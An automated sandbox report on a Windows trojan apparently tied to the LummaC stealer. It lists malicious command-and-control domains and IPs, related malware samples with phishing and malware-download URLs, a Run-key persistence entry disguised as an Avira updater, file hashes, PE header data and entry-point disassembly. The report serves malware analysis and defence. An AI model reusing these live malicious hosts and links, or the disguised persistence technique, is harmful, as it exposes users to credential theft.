| https://reinforcenh.shop/apiiU | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://offensivedzvju.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://vozmeatillu.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://steamcommunity.com/discussions/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://piriform.com/go/app_cc_privacy_policySecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://store.steampowered.com/stats/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://medal.tvSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://store.steampowered.com/steam_refunds/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://reinforcenh.shop/7SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BC3000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://ballotnwu.site/cPSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://steamcommunity.com/workshop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://store.steampowered.com/legal/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://ballotnwu.site/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ghostreedmnu.shop/fSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.4.136 | gutterydhowi.shop | United States | 13335 | CLOUDFLARENETUS | true
188.114.97.3 | fragnantbui.shop | European Union | 13335 | CLOUDFLARENETUS | true
172.67.162.108 | drawzhotdog.shop | United States | 13335 | CLOUDFLARENETUS | true
172.67.128.144 | ballotnwu.site | United States | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | stogeneratmns.shop | European Union | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
172.67.208.139 | reinforcenh.shop | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519702
Start date and time: 2024-09-26 21:25:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/1@10/7
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 53%
• Number of executed functions: 214
• Number of non-executed functions: 16
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
Time | Type | Description
15:26:16 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe modified
20:26:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OculusAvira C:\Users\user\Music\AviraUpdater\AviraOculus.exe
20:26:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OculusAvira C:\Users\user\Music\AviraUpdater\AviraOculus.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.4.136 | file.exe | malicious | LummaC |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | 3ZD5tEC5DH.exe | malicious | LummaC |
104.21.4.136 | a7HdB2dU5P.exe | malicious | LummaC |
104.21.4.136 | file.exe | malicious | LummaC, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
104.21.4.136 | file.exe | malicious | LummaC, Stealc, Vidar |
188.114.97.3 | HpCQgSai4e.exe | malicious | FormBook | www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
188.114.97.3 | QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/Ky4pZ0WB/download
188.114.97.3 | ADNOC requesting RFQ.exe | malicious | FormBook | www.1win-moldovia.fun/1g7m/
188.114.97.3 | http://www.tiktok758.com/ | malicious | Unknown | www.tiktok758.com/img/logo.4c830710.svg
188.114.97.3 | TRmSF36qQG.exe | malicious | FormBook | www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
188.114.97.3 | PO5118000306 pdf.exe | malicious | FormBook | www.rtprajalojago.live/2wnz/
188.114.97.3 | (PO403810)_VOLEX_doc.exe | malicious | Lokibot | dddotx.shop/Mine/PWS/fre.php
188.114.97.3 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/DiF66Hbf/download
188.114.97.3 | http://easyantrim.pages.dev/id.html | malicious | HTMLPhisher | easyantrim.pages.dev/id.html
188.114.97.3 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/13rSMZZi/download
172.67.162.108 | file.exe | malicious | LummaC |
172.67.162.108 | file.exe | malicious | LummaC, Vidar |
172.67.162.108 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.162.108 | 3ZD5tEC5DH.exe | malicious | LummaC |
172.67.162.108 | file.exe | malicious | LummaC, Vidar |
172.67.162.108 | file.exe | malicious | LummaC, Vidar |
172.67.162.108 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.162.108 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.162.108 | file.exe | malicious | LummaC, Stealc, Vidar |
172.67.162.108 | SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
offensivedzvju.shop | file.exe | malicious | LummaC | 188.114.96.3
offensivedzvju.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
offensivedzvju.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3
offensivedzvju.shop | 3ZD5tEC5DH.exe | malicious | LummaC | 188.114.96.3
offensivedzvju.shop | a7HdB2dU5P.exe | malicious | LummaC | 188.114.96.3
offensivedzvju.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
offensivedzvju.shop | bYQ9uTqLzz.exe | malicious | LummaC | 188.114.97.3
offensivedzvju.shop | file.exe | malicious | LummaC, Vidar | 188.114.96.3
offensivedzvju.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
offensivedzvju.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
gutterydhowi.shop | file.exe | malicious | LummaC | 104.21.4.136
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.4.136
gutterydhowi.shop | 3ZD5tEC5DH.exe | malicious | LummaC | 104.21.4.136
gutterydhowi.shop | a7HdB2dU5P.exe | malicious | LummaC | 104.21.4.136
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 172.67.132.32
gutterydhowi.shop | bYQ9uTqLzz.exe | malicious | LummaC | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 172.67.132.32
gutterydhowi.shop | file.exe | malicious | LummaC, Vidar | 104.21.4.136
gutterydhowi.shop | file.exe | malicious | LummaC, Stealc, Vidar | 172.67.132.32
steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 104.102.49.254
steamcommunity.com | file.exe | malicious | Vidar | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Stealc, Vidar | 104.102.49.254
steamcommunity.com | file.exe | malicious | Vidar | 104.102.49.254
steamcommunity.com | file.exe | malicious | Unknown | 104.102.49.254
steamcommunity.com | 3ZD5tEC5DH.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | a7HdB2dU5P.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Z09QznvZSr.exe | malicious | Unknown | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Vidar | 104.102.49.254
fragnantbui.shop | file.exe | malicious | LummaC | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.96.3
fragnantbui.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
fragnantbui.shop | 3ZD5tEC5DH.exe | malicious | LummaC | 188.114.96.3
fragnantbui.shop | a7HdB2dU5P.exe | malicious | LummaC | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | bYQ9uTqLzz.exe | malicious | LummaC | 188.114.96.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
fragnantbui.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | CLQD.htm | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.208.139
CLOUDFLARENETUS | https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ== | malicious | Unknown | 104.26.4.39
CLOUDFLARENETUS | https://solvetherecaptcha404.webflow.io/404 | malicious | Unknown | 104.18.160.117
CLOUDFLARENETUS | Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml | malicious | Unknown | 104.16.117.116
CLOUDFLARENETUS | https://empshentel.com/share/sharefile/ | malicious | HTMLPhisher | 172.67.177.128
CLOUDFLARENETUS | file.exe | malicious | LummaC, Vidar | 172.67.208.139
CLOUDFLARENETUS | http://egynte.com/ | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ== | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exe | malicious | Unknown | 172.67.130.49
                                                                        CLOUDFLARENETUSCLQD.htmGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.25.14
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.208.139
                                                                        https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 104.26.4.39
                                                                        https://solvetherecaptcha404.webflow.io/404Get hashmaliciousUnknownBrowse
                                                                        • 104.18.160.117
                                                                        Daniel Leblanc shared _Incendie Hudson._ with you. #12.emlGet hashmaliciousUnknownBrowse
                                                                        • 104.16.117.116
                                                                        https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.177.128
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.208.139
                                                                        http://egynte.com/Get hashmaliciousUnknownBrowse
                                                                        • 1.1.1.1
                                                                        https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.130.49
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse
file.exe | Get hash | malicious | LummaC, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse
http://google.com | Get hash | malicious | LummaC | Browse
https://finalstepgo.com/uploads/il2.txt | Get hash | malicious | LummaC | Browse
https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH | Get hash | malicious | Unknown | Browse
0.dll | Get hash | malicious | Bazar Loader, BruteRatel, Latrodectus | Browse
DropboxInstaller.exe | Get hash | malicious | Unknown | Browse
DropboxInstaller.exe | Get hash | malicious | Unknown | Browse
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):976635604
                                                                        Entropy (8bit):0.06714450256170998
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8BE4BFF57BE5FD22245CC37F593A8403
                                                                        SHA1:D60EE5C2C022DA0C44BD8DF6C3DD92F0770B1252
                                                                        SHA-256:5F9DF9BC97FF925BF63CA3D131F02029A02AA15BE6646545A26B864349EC671A
                                                                        SHA-512:EC75CBB84F8BE0A4892FA90A4386BE61D894FB76ECF99CED18E29962EB641819585A287BD2B5DFF855CCB4427E1E24F5C6186BE2460B12208382147AEAA32B32
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....D_..................)..L......D))......0)...@...........................J.......;..........@....................+.^....p+..;...p/.`b....................+..{............................+......................z+.$.....+......................text.....).......(................. ..`.itext... ....).......(............. ..`.data........0).......).............@....bss..........).......)..................idata...@...p+..<....).............@....didata.......+.......).............@....edata........+.......).............@..@.tls..........+.......)..................rdata........+.......).............@..@.rsrc...`b...p/..d....).............@..@......................................................6.......4.............@..@................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.916936552707879
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        File name:SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        File size:4'547'072 bytes
                                                                        MD5:aaf6f0c0f007e9462c8bf58acd555caf
                                                                        SHA1:0125e82a9f1ec4297c6d3bf8f541882b5531f5f6
                                                                        SHA256:927f2074ad7b76b46535cc94eb1fb357e528258dd0e55d828decb5ff5e70d2b9
                                                                        SHA512:10dda1dd3d3f314f121402ed68e7647ace982837d2a2806be59e202efe1a4d5b5327a697b78db2a5bb610e3219e5bb7180b60fd5f90efa3c239aa9c7c737034b
                                                                        SSDEEP:98304:tUimFOVwFe8GZ0BbNiiFEqTMij7I6Z53T1J:q1E6dTX
                                                                        TLSH:AB267DDE72C6243EC067163359264960D83BBB3125B788CFFAA46D0CCE35253A935E5B
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                        Icon Hash:3279ece68ccc7186
                                                                        Entrypoint:0x692944
                                                                        Entrypoint Section:.itext
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x5F44F5B2 [Tue Aug 25 11:27:46 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:3b9a78dc6660323834e59d95d337069d
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFF0h
                                                                        mov eax, 00689774h
                                                                        call 00007F9FDC3F4581h
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F9FDC5BA449h
                                                                        mov cl, 01h
                                                                        mov edx, 006929B8h
                                                                        mov eax, dword ptr [005800D8h]
                                                                        call 00007F9FDC579A6Ch
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov edx, 006929E4h
                                                                        call 00007F9FDC5B9DD7h
                                                                        mov ecx, dword ptr [0069C6F0h]
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov edx, dword ptr [00645DE8h]
                                                                        call 00007F9FDC5BA427h
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F9FDC5BA57Fh
                                                                        call 00007F9FDC3EF55Eh
                                                                        add byte ptr [eax-00FFFDFCh], dh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2bc000 | 0x5e | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b7000 | 0x3b14 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2f7000 | 0x1b6260 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
